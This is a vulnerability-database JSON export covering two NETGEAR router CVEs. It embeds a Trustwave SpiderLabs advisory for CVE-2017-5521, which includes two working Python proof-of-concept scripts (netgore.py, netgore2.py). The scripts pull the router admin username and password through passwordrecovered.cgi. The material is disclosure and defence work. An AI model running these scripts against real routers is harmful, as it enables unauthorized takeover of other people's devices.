"accessVector": "Network",
"authentication": "None",
"author": "NVD",
"availabilityImpact": "None",
"baseScore": 5.0,
"confidentialityImpact": "None",
"exploitabilityScore": null,
"id": "JVNDB-2017-014925",
"impactScore": null,
"integrityImpact": "Partial",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "Medium",
"trust": 0.8,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "CNVD",
"availabilityImpact": "NONE",
"baseScore": 5.0,
"confidentialityImpact": "NONE",
"exploitabilityScore": 10.0,
"id": "CNVD-2021-61047",
"impactScore": 2.9,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 0.6,
"vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "nvd@nist.gov",
"availabilityImpact": "NONE",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"exploitabilityScore": 3.9,
"id": "CVE-2017-18799",
"impactScore": 3.6,
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
"version": "3.1"
},
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "cve@mitre.org",
"availabilityImpact": "NONE",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 3.9,
"id": "CVE-2017-18799",
"impactScore": 3.6,
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
"version": "3.0"
},
{
"attackComplexity": "Low",
"attackVector": "Network",
"author": "NVD",
"availabilityImpact": "None",
"baseScore": 7.5,
"baseSeverity": "High",
"confidentialityImpact": "None",
"exploitabilityScore": null,
"id": "JVNDB-2017-014925",
"impactScore": null,
"integrityImpact": "High",
"privilegesRequired": "None",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
"version": "3.0"
}
],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2017-18799",
"trust": 1.0,
"value": "HIGH"
},
{
"author": "cve@mitre.org",
"id": "CVE-2017-18799",
"trust": 1.0,
"value": "HIGH"
},
{
"author": "NVD",
"id": "JVNDB-2017-014925",
"trust": 0.8,
"value": "High"
},
{
"author": "CNVD",
"id": "CNVD-2021-61047",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "CNNVD",
"id": "CNNVD-202004-1829",
"trust": 0.6,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2021-61047"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-014925"
},
{
"db": "CNNVD",
"id": "CNNVD-202004-1829"
},
{
"db": "NVD",
"id": "CVE-2017-18799"
},
{
"db": "NVD",
"id": "CVE-2017-18799"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Certain NETGEAR devices are affected by incorrect configuration of security settings. This affects R6200v2 before 1.0.3.14, R6250 before 1.0.4.8, R6300v2 before 1.0.4.8, R6700 before 1.1.1.20, R7000 before 1.0.7.10, R7000P/R6900P before 1.0.0.56, R7100LG before 1.0.0.30, R7900 before 1.0.1.14, R8000 before 1.0.3.22, R8500 before 1.0.2.74, and D8500 before 1.0.3.28. plural NETGEAR The device contains an input verification vulnerability.Information may be tampered with. NETGEAR D8500, etc. are all products of NETGEAR. NETGEAR D8500 is a wireless modem. NETGEAR R6250 is a wireless router. NETGEAR R6700 is a wireless router. No detailed vulnerability details are currently provided",
"sources": [
{
"db": "NVD",
"id": "CVE-2017-18799"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-014925"
},
{
"db": "CNVD",
"id": "CNVD-2021-61047"
}
],
"trust": 2.16
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2017-18799",
"trust": 3.0
},
{
"db": "JVNDB",
"id": "JVNDB-2017-014925",
"trust": 0.8
},
{
"db": "CNVD",
"id": "CNVD-2021-61047",
"trust": 0.6
},
{
"db": "CNNVD",
"id": "CNNVD-202004-1829",
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2021-61047"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-014925"
},
{
"db": "CNNVD",
"id": "CNNVD-202004-1829"
},
{
"db": "NVD",
"id": "CVE-2017-18799"
}
]
},
"id": "VAR-202004-1312",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2021-61047"
}
],
"trust": 1.087085019230769
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"Network device"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2021-61047"
}
]
},
"last_update_date": "2024-11-23T22:41:06.828000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Security Advisory for Security Misconfiguration Vulnerability on D8500 and Some Routers, PSV-2017-0528",
"trust": 0.8,
"url": "https://kb.netgear.com/000049357/Security-Advisory-for-Security-Misconfiguration-Vulnerability-on-D8500-and-Some-Routers-PSV-2017-0528"
},
{
"title": "Patch for Multiple NETGEAR products input verification error vulnerability (CNVD-2021-61047)",
"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchInfo/show/284581"
},
{
"title": "Multiple NETGEAR Product input verification error vulnerability fixes",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=117218"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2021-61047"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-014925"
},
{
"db": "CNNVD",
"id": "CNNVD-202004-1829"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-20",
"trust": 1.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2017-014925"
},
{
"db": "NVD",
"id": "CVE-2017-18799"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.0,
"url": "https://nvd.nist.gov/vuln/detail/cve-2017-18799"
},
{
"trust": 1.6,
"url": "https://kb.netgear.com/000049357/security-advisory-for-security-misconfiguration-vulnerability-on-d8500-and-some-routers-psv-2017-0528"
},
{
"trust": 0.8,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2017-18799"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2021-61047"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-014925"
},
{
"db": "CNNVD",
"id": "CNNVD-202004-1829"
},
{
"db": "NVD",
"id": "CVE-2017-18799"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CNVD",
"id": "CNVD-2021-61047"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-014925"
},
{
"db": "CNNVD",
"id": "CNNVD-202004-1829"
},
{
"db": "NVD",
"id": "CVE-2017-18799"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2021-08-08T00:00:00",
"db": "CNVD",
"id": "CNVD-2021-61047"
},
{
"date": "2020-05-22T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2017-014925"
},
{
"date": "2020-04-21T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202004-1829"
},
{
"date": "2020-04-21T19:15:12.427000",
"db": "NVD",
"id": "CVE-2017-18799"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2021-08-11T00:00:00",
"db": "CNVD",
"id": "CNVD-2021-61047"
},
{
"date": "2020-05-22T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2017-014925"
},
{
"date": "2020-04-26T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202004-1829"
},
{
"date": "2024-11-21T03:20:57.243000",
"db": "NVD",
"id": "CVE-2017-18799"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202004-1829"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "plural NETGEAR Input verification vulnerabilities on devices",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2017-014925"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "input validation error",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202004-1829"
}
],
"trust": 0.6
}
}
var-201701-0766
Vulnerability from variot
An issue was discovered on NETGEAR R8500, R8300, R7000, R6400, R7300, R7100LG, R6300v2, WNDR3400v3, WNR3500Lv2, R6250, R6700, R6900, and R8000 devices. They are prone to password disclosure via simple crafted requests to the web management server. The bug is exploitable remotely if the remote management option is set, and can also be exploited given access to the router over LAN or WLAN. When trying to access the web panel, a user is asked to authenticate; if the authentication is canceled and password recovery is not enabled, the user is redirected to a page that exposes a password recovery token. If a user supplies the correct token to the page /passwordrecovered.cgi?id=TOKEN (and password recovery is not enabled), they will receive the admin password for the router. If password recovery is set the exploit will fail, as it will ask the user for the recovery questions that were previously set when enabling that feature. This is persistent (even after disabling the recovery option, the exploit will fail) because the router will ask for the security questions. NETGEARR8500, R8300, R7000, R6400, R7300, R7100LG, R6300v2, WNDR3400v3, WNR3500Lv2, R6250, R6700, R6900 and R8000 are Netgear's wireless router products. There are information disclosure vulnerabilities in several NETGEAR products. Successful exploits will allow attackers to obtain sensitive information, such as credentials, that may aid in further attacks. Trustwave SpiderLabs Security Advisory TWSL2017-003: Multiple Vulnerabilities in NETGEAR Routers
Published: 01/30/2017 Version: 1.0
Vendor: NETGEAR (http://www.netgear.com/) Product: Multiple products
Finding 1: Remote and Local Password Disclosure Credit: Simon Kenin of Trustwave SpiderLabs CVE: CVE-2017-5521
Version affected:
AC1450 V1.0.0.34_10.0.16 (Latest)
AC1450 V1.0.0.22_1.0.10
AC1450 V1.0.0.14_1.0.6
D6400 V1.0.0.44_1.0.44 (V1.0.0.52_1.0.52 and above not affected)
D6400 V1.0.0.34_1.3.34
D6400 V1.0.0.38_1.1.38
D6400 V1.0.0.22_1.0.22
DC112A V1.0.0.30_1.0.60 (Latest)
DGN2200v4 V1.0.0.24_5.0.8 (V1.0.0.66_1.0.66 is latest and is not affected)
JNDR3000 V1.0.0.18_1.0.16 (Latest)
R6200 V1.0.1.48_1.0.37 (V1.0.1.52_1.0.41 and above are not affected)
R6200v2 V1.0.1.20_1.0.18 (V1.0.3.10_10.1.10 is latest and is not affected)
R6250 V1.0.1.84_1.0.78 (V1.0.4.2_10.1.10 is latest and is not affected)
R6300 V1.0.2.78_1.0.58 (Latest)
R6300v2 V1.0.4.2_10.0.74 (V1.0.4.6_10.0.76 is latest and is patched)
R6300v2 V1.0.3.30_10.0.73
R6700 V1.0.1.14_10.0.29 (Latest beta)
R6700 V1.0.0.26_10.0.26 (Latest stable)
R6700 V1.0.0.24_10.0.18
R6900 V1.0.0.4_1.0.10 (Latest)
R7000 V1.0.6.28_1.1.83 (V1.0.7.2_1.1.93 is latest and is patched)
R8300 V1.0.2.48_1.0.52
R8500 V1.0.2.30_1.0.43 (V1.0.2.64_1.0.62 and above is patched)
R8500 V1.0.2.26_1.0.41
R8500 V1.0.0.56_1.0.28
R8500 V1.0.0.20_1.0.11
VEGN2610 V1.0.0.35_1.0.35 (Latest)
VEGN2610 V1.0.0.29_1.0.29
VEGN2610 V1.0.0.27_1.0.27
WNDR3400v2 V1.0.0.16_1.0.34 (V1.0.0.52_1.0.81 is latest and is not affected)
WNDR3400v3 V1.0.0.22_1.0.29 (V1.0.1.2_1.0.51 is latest and is not affected)
WNDR3700v3 V1.0.0.38_1.0.31 (Latest)
WNDR4000 V1.0.2.4_9.1.86 (Latest)
WNDR4500 V1.0.1.40_1.0.68 (Latest)
WNDR4500v2 V1.0.0.60_1.0.38 (Latest)
WNDR4500v2 V1.0.0.42_1.0.25
WGR614v10 V1.0.2.60_60.0.85NA (Latest)
WGR614v10 V1.0.2.58_60.0.84NA
WGR614v10 V1.0.2.54_60.0.82NA
WN3100RP V1.0.0.14_1.0.19 (Latest)
WN3100RP V1.0.0.6_1.0.12
Lenovo R3220 V1.0.0.16_1.0.16 (Latest)
Lenovo R3220 V1.0.0.13_1.0.13
Product description: Multiple Netgear Routers
Many Netgear routers are prone to password disclosure via simple crafted requests to the web management server. This can easily be reproduced using the attached poc, or by sending these two simple requests via the browser: 1. http://router/.../ will redirect you to http://router/..../unauth.cgi?id=TOKEN to acquire the token 2. http://router/passwordrecovered.cgi?id=TOKEN will give you credentials (some models require you to send a post request instead of get)
netgore.py
import sys import requests
def scrape(text, start_trig, end_trig): if text.find(start_trig) != -1: return text.split(start_trig, 1)[-1].split(end_trig, 1)[0] else: return "i_dont_speak_english"
disable nasty insecure ssl warning
requests.packages.urllib3.disable_warnings()
1st stage - get token
ip = sys.argv[1] port = sys.argv[2] url = 'http://' + ip + ':' + port + '/' try: r = requests.get(url) except: url = 'https://' + ip + ':' + port + '/' r = requests.get(url, verify=False) model = r.headers.get('WWW-Authenticate') if model is not None: print "Attcking: " + model[13:-1] else: print "not a netgear router" sys.exit(0) token = scrape(r.text, 'unauth.cgi?id=', '\"') if token == 'i_dont_speak_english': print "not vulnerable" sys.exit(0) print "token found: " + token
2nd stage - pass the token - get the password
url = url + 'passwordrecovered.cgi?id=' + token r = requests.post(url, verify=False)
profit
if r.text.find('left\">') != -1: username = (repr(scrape(r.text, 'Router Admin Username', ''))) username = scrape(username, '>', '\'') password = (repr(scrape(r.text, 'Router Admin Password', ''))) password = scrape(password, '>', '\'') if username == "i_dont_speak_english": username = (scrape(r.text[r.text.find('left\">'):-1], 'left\">', '')) password = (scrape(r.text[r.text.rfind('left\">'):-1], 'left\">', '')) else: print "not vulnerable becuse password recovery IS set" sys.exit(0)
html encoding pops out of nowhere, lets replace that
password = password.replace("#","#") password = password.replace("&","&") print "user: " + username print "pass: " + password
================================ Just run the PoC against a router to get the credentials if it is vulnerable.
Finding 2: Remote and Local Password Disclosure Credit: Simon Kenin of Trustwave SpiderLabs CVE: CVE-2017-5521
Version affected:
AC1450 V1.0.0.34_10.0.16 (Latest)
AC1450 V1.0.0.22_1.0.10
AC1450 V1.0.0.14_1.0.6
D6300 V1.0.0.96_1.1.96 (Latest)
D6300B V1.0.0.36_1.0.36
D6300B V1.0.0.32_1.0.32
D6400 V1.0.0.44_1.0.44 (V1.0.0.52_1.0.52 is latest and is patched)
D6400 V1.0.0.22_1.0.22
DC112A V1.0.0.30_1.0.60 (Latest)
DGN2200v4 V1.0.0.76_1.0.76 (Latest)
DGN2200v4 V1.0.0.66_1.0.66
DGN2200Bv4 V1.0.0.68_1.0.68 (Latest)
JNDR3000 V1.0.0.18_1.0.16 (Latest)
R6200 V1.0.1.56_1.0.43 (Latest)
R6200 V1.0.1.52_1.0.41
R6200 V1.0.1.48_1.0.37
R6200v2 V1.0.3.10_10.1.10 (Latest)
R6200v2 V1.0.1.20_1.0.18
R6250 V1.0.4.6_10.1.12 (Latest beta)
R6250 V1.0.4.2_10.1.10 (Latest stable)
R6250 V1.0.1.84_1.0.78
R6300 V1.0.2.78_1.0.58 (Latest)
R6300v2 V1.0.4.2_10.0.74 (V1.0.4.6_10.0.76 is latest and is patched)
R6300v2 V1.0.3.6_1.0.63CH (Charter Comm.)
R6400 V1.0.0.26_1.0.14 (V1.0.1.12_1.0.11 is latest and is patched)
R6700 V1.0.0.26_10.0.26 (Latest)
R6700 V1.0.0.24_10.0.18
R6900 V1.0.0.4_1.0.10 (Latest)
R7000 V1.0.6.28_1.1.83 (V1.0.7.2_1.1.93 is latest and is patched)
R7000 V1.0.4.30_1.1.67
R7900 V1.0.1.8_10.0.14 (Latest beta)
R7900 V1.0.1.4_10.0.12 (Latest stable)
R7900 V1.0.0.10_10.0.7
R7900 V1.0.0.8_10.0.5
R7900 V1.0.0.6_10.0.4
R8000 V1.0.3.26_1.1.18 (Latest beta)
R8000 V1.0.3.4_1.1.2 (Latest stable)
R8300 V1.0.2.48_1.0.52
R8500 V1.0.0.56_1.0.28 (V1.0.2.64_1.0.62 and above is patched)
R8500 V1.0.2.30_1.0.43
VEGN2610 V1.0.0.35_1.0.35 (Latest)
VEGN2610 V1.0.0.27_1.0.27
VEGN2610-1FXAUS V1.0.0.36_1.0.36 (Latest)
VEVG2660 V1.0.0.23_1.0.23
WNDR3400v2 V1.0.0.52_1.0.81 (Latest)
WNDR3400v3 V1.0.1.4_1.0.52 (Latest)
WNDR3400v3 V1.0.1.2_1.0.51
WNDR3400v3 V1.0.0.22_1.0.29
WNDR3700v3 V1.0.0.38_1.0.31 (Latest)
WNDR4000 V1.0.2.4_9.1.86 (Latest)
WNDR4500 V1.0.1.40_1.0.68 (Latest)
WNDR4500 V1.0.1.6_1.0.24
WNDR4500v2 V1.0.0.60_1.0.38 (Latest)
WNDR4500v2 V1.0.0.50_1.0.30
WNR1000v3 V1.0.2.68_60.0.93NA (Latest)
WNR1000v3 V1.0.2.62_60.0.87 (Latest)
WNR3500Lv2 V1.2.0.34_40.0.75 (Latest)
WNR3500Lv2 V1.2.0.32_40.0.74
WGR614v10 V1.0.2.60_60.0.85NA (Latest)
WGR614v10 V1.0.2.58_60.0.84NA
WGR614v10 V1.0.2.54_60.0.82NA
Lenovo R3220 V1.0.0.16_1.0.16 (Latest)
Lenovo R3220 V1.0.0.13_1.0.13
Many Netgear routers are prone to password disclosure via simple crafted request to the web management server.
This mechanism does not work correctly on the very first request to "passwordrecovered.cgi" and the token is not properly checked, this means that any TOKEN value will result in disclosure of the password. The issue occurs after every reboot of the router.
This can easily be reproduced using the attached poc, or by sending a simple request via the browser: 1. http://router/passwordrecovered.cgi?id=Trustwave_SpiderLabs will give you credentials (some models require you to send a post request instead of get)
netgore2.py
import sys import requests
def scrape(text, start_trig, end_trig): if text.find(start_trig) != -1: return text.split(start_trig, 1)[-1].split(end_trig, 1)[0] else: return "i_dont_speak_english"
disable nasty insecure ssl warning
requests.packages.urllib3.disable_warnings()
1st stage
ip = sys.argv[1] port = sys.argv[2] url = 'http://' + ip + ':' + port + '/' try: r = requests.get(url) except: url = 'https://' + ip + ':' + port + '/' r = requests.get(url, verify=False) model = r.headers.get('WWW-Authenticate') if model is not None: print "Attcking: " + model[13:-1] else: print "not a netgear router" sys.exit(0)
2nd stage
url = url + 'passwordrecovered.cgi?id=get_rekt' try: r = requests.post(url, verify=False) except: print "not vulnerable router" sys.exit(0)
profit
if r.text.find('left\">') != -1: username = (repr(scrape(r.text, 'Router Admin Username', ''))) username = scrape(username, '>', '\'') password = (repr(scrape(r.text, 'Router Admin Password', ''))) password = scrape(password, '>', '\'') if username == "i_dont_speak_english": username = (scrape(r.text[r.text.find('left\">'):-1], 'left\">', '')) password = (scrape(r.text[r.text.rfind('left\">'):-1], 'left\">', '')) else: print "not vulnerable router, or some one else already accessed passwordrecovered.cgi, reboot router and test again" sys.exit(0)
html encoding pops out of nowhere, lets replace that
password = password.replace("#","#") password = password.replace("&","&") print "user: " + username print "pass: " + password
================================ Just run the PoC against a router to get the credentials if it is vulnerable.
Remediation Steps: Please see NETGEAR's KBA for list of firmware patches for various models.
Revision History: 04/06/2016 - Vulnerability disclosed to vendor 04/19/2016 - Request for update and received confirmation of receipt of the advisories 05/18/2016 - Request for update; no response 07/14/2016 - Request for update 07/15/2016 - Notice of patch for some models and workaround KBA received along with commitment towards 100% coverage 10/17/2016 - Request for update 12/15/2016 - Notice of intent to publish advisories 01/04/2017 - Vendor responds with patch timeline and announcement of participation in Bugcrowd 01/30/2017 - Advisory published
References 1. http://c1ph04text.blogspot.com/2014/01/mitrm-attacks-your-middle-or-mine.html 2. https://www.exploit-db.com/exploits/32883/ 3. http://kb.netgear.com/30632/Web-GUI-Password-Recovery-and-Exposure-Security-Vulnerability
About Trustwave: Trustwave is the leading provider of on-demand and subscription-based information security and payment card industry compliance management solutions to businesses and government entities throughout the world. For organizations faced with today's challenging data security and compliance environment, Trustwave provides a unique approach with comprehensive solutions that include its flagship TrustKeeper compliance management software and other proprietary security solutions. Trustwave has helped thousands of organizations--ranging from Fortune 500 businesses and large financial institutions to small and medium-sized retailers--manage compliance and secure their network infrastructure, data communications and critical information assets. Trustwave is headquartered in Chicago with offices throughout North America, South America, Europe, Africa, China and Australia. For more information, visit https://www.trustwave.com
About Trustwave SpiderLabs: SpiderLabs(R) is the advanced security team at Trustwave focused on application security, incident response, penetration testing, physical security and security research. The team has performed over a thousand incident investigations, thousands of penetration tests and hundreds of application security tests globally. In addition, the SpiderLabs Research team provides intelligence through bleeding-edge research and proof of concept tool development to enhance Trustwave's products and services. https://www.trustwave.com/spiderlabs
Disclaimer: The information provided in this advisory is provided "as is" without warranty of any kind. Trustwave disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose. In no event shall Trustwave or its suppliers be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if Trustwave or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply
Show details on source website{
"affected_products": {
"_id": null,
"data": [
{
"_id": null,
"model": "wndr3700v3",
"scope": null,
"trust": 1.6,
"vendor": "\u30cd\u30c3\u30c8\u30ae\u30a2",
"version": null
},
{
"_id": null,
"model": "d6400",
"scope": null,
"trust": 1.6,
"vendor": "\u30cd\u30c3\u30c8\u30ae\u30a2",
"version": null
},
{
"_id": null,
"model": "wnr1000v3",
"scope": null,
"trust": 1.6,
"vendor": "\u30cd\u30c3\u30c8\u30ae\u30a2",
"version": null
},
{
"_id": null,
"model": "r6300",
"scope": null,
"trust": 1.6,
"vendor": "\u30cd\u30c3\u30c8\u30ae\u30a2",
"version": null
},
{
"_id": null,
"model": "d6220",
"scope": null,
"trust": 1.6,
"vendor": "\u30cd\u30c3\u30c8\u30ae\u30a2",
"version": null
},
{
"_id": null,
"model": "wndr4500",
"scope": null,
"trust": 1.6,
"vendor": "\u30cd\u30c3\u30c8\u30ae\u30a2",
"version": null
},
{
"_id": null,
"model": "d6300b",
"scope": null,
"trust": 1.6,
"vendor": "\u30cd\u30c3\u30c8\u30ae\u30a2",
"version": null
},
{
"_id": null,
"model": "r6200",
"scope": null,
"trust": 1.6,
"vendor": "\u30cd\u30c3\u30c8\u30ae\u30a2",
"version": null
},
{
"_id": null,
"model": "ac1450",
"scope": null,
"trust": 1.6,
"vendor": "\u30cd\u30c3\u30c8\u30ae\u30a2",
"version": null
},
{
"_id": null,
"model": "wndr4000",
"scope": null,
"trust": 1.6,
"vendor": "\u30cd\u30c3\u30c8\u30ae\u30a2",
"version": null
},
{
"_id": null,
"model": "d6300",
"scope": null,
"trust": 1.6,
"vendor": "\u30cd\u30c3\u30c8\u30ae\u30a2",
"version": null
},
{
"_id": null,
"model": "dgn2200bv4",
"scope": null,
"trust": 1.6,
"vendor": "\u30cd\u30c3\u30c8\u30ae\u30a2",
"version": null
},
{
"_id": null,
"model": "vegn2610",
"scope": null,
"trust": 1.6,
"vendor": "\u30cd\u30c3\u30c8\u30ae\u30a2",
"version": null
},
{
"_id": null,
"model": "d6220",
"scope": "eq",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.0.12"
},
{
"_id": null,
"model": "d6300",
"scope": "eq",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.0.96"
},
{
"_id": null,
"model": "d6400",
"scope": "eq",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.0.44"
},
{
"_id": null,
"model": "wndr3700v3",
"scope": "eq",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.0.40_1.0.32"
},
{
"_id": null,
"model": "wndr4000",
"scope": "eq",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.2.4_9.1.86"
},
{
"_id": null,
"model": "d6300b",
"scope": "eq",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.0.40"
},
{
"_id": null,
"model": "wndr4500",
"scope": "eq",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.1.44_1.0.73"
},
{
"_id": null,
"model": "dgn2200bv4",
"scope": "eq",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.0.68"
},
{
"_id": null,
"model": "ac1450",
"scope": "eq",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.0.34_10.0.16"
},
{
"_id": null,
"model": "wnr1000v3",
"scope": "eq",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.2.68_60.0.93"
},
{
"_id": null,
"model": "r6200",
"scope": "eq",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.1.56_1.0.43"
},
{
"_id": null,
"model": "vegn2610",
"scope": "eq",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.0.36"
},
{
"_id": null,
"model": "r6300",
"scope": "eq",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.2.78_1.0.58"
},
{
"_id": null,
"model": "r8500",
"scope": "eq",
"trust": 0.9,
"vendor": "netgear",
"version": "0"
},
{
"_id": null,
"model": "r7000",
"scope": "eq",
"trust": 0.9,
"vendor": "netgear",
"version": "0"
},
{
"_id": null,
"model": "r8300",
"scope": "eq",
"trust": 0.9,
"vendor": "netgear",
"version": "0"
},
{
"_id": null,
"model": "r6400",
"scope": "eq",
"trust": 0.9,
"vendor": "netgear",
"version": "0"
},
{
"_id": null,
"model": "r7300",
"scope": "eq",
"trust": 0.9,
"vendor": "netgear",
"version": "0"
},
{
"_id": null,
"model": "r7100lg",
"scope": "eq",
"trust": 0.9,
"vendor": "netgear",
"version": "0"
},
{
"_id": null,
"model": "r6300v2",
"scope": "eq",
"trust": 0.9,
"vendor": "netgear",
"version": "0"
},
{
"_id": null,
"model": "wndr3400v3",
"scope": "eq",
"trust": 0.9,
"vendor": "netgear",
"version": "0"
},
{
"_id": null,
"model": "wnr3500lv2",
"scope": "eq",
"trust": 0.9,
"vendor": "netgear",
"version": "0"
},
{
"_id": null,
"model": "r6250",
"scope": "eq",
"trust": 0.9,
"vendor": "netgear",
"version": "0"
},
{
"_id": null,
"model": "r6700",
"scope": "eq",
"trust": 0.9,
"vendor": "netgear",
"version": "0"
},
{
"_id": null,
"model": "r8000",
"scope": "eq",
"trust": 0.9,
"vendor": "netgear",
"version": "0"
},
{
"_id": null,
"model": "r6900",
"scope": "eq",
"trust": 0.9,
"vendor": "netgear",
"version": "0"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2017-00835"
},
{
"db": "BID",
"id": "95457"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-001263"
},
{
"db": "CNNVD",
"id": "CNNVD-201701-454"
},
{
"db": "NVD",
"id": "CVE-2017-5521"
}
]
},
"credits": {
"_id": null,
"data": "The vendor reported this issue.",
"sources": [
{
"db": "BID",
"id": "95457"
}
],
"trust": 0.3
},
"cve": "CVE-2017-5521",
"cvss": {
"_id": null,
"data": [
{
"cvssV2": [
{
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "nvd@nist.gov",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 8.6,
"id": "CVE-2017-5521",
"impactScore": 2.9,
"integrityImpact": "NONE",
"severity": "MEDIUM",
"trust": 1.9,
"vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N",
"version": "2.0"
},
{
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
